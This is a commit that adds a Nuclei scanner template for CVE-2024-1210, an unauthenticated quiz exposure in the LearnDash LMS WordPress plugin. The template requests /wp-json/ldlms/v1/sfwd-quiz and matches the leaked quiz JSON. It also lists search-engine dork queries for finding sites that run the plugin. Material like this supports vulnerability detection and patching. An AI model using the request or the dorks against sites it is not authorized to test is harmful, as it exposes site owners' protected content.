Merge pull request #9178 from projectdiscovery/CVE-2024-1210

Create CVE-2024-1210.yaml
2024-02-21 08:44:55 +05:30 · 2024-02-21 08:44:55 +05:30 · b1d4df0e73
parent 5eb3ac2e85 6ed93717f6
commit b1d4df0e73
1 changed files with 51 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-1210.yaml
+++ b/http/cves/2024/CVE-2024-1210.yaml
@ -0,0 +1,51 @@
+id: CVE-2024-1210
+
+info:
+  name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure
+  author: ritikchaddha
+  severity: medium
+  description: |
+    The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.
+  remediation: Fixed in 4.10.2
+  reference:
+    - https://wpscan.com/vulnerability/f4b12179-3112-465a-97e1-314721f7fe3d/
+    - https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-1210
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2024-1210
+    cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    vendor: learndash
+    product: learndash
+    framework: wordpress
+    googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
+    publicwww-query: "/wp-content/plugins/sfwd-lms"
+  tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id":'
+          - '"quiz_materials":'
+          - 'quizzes'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200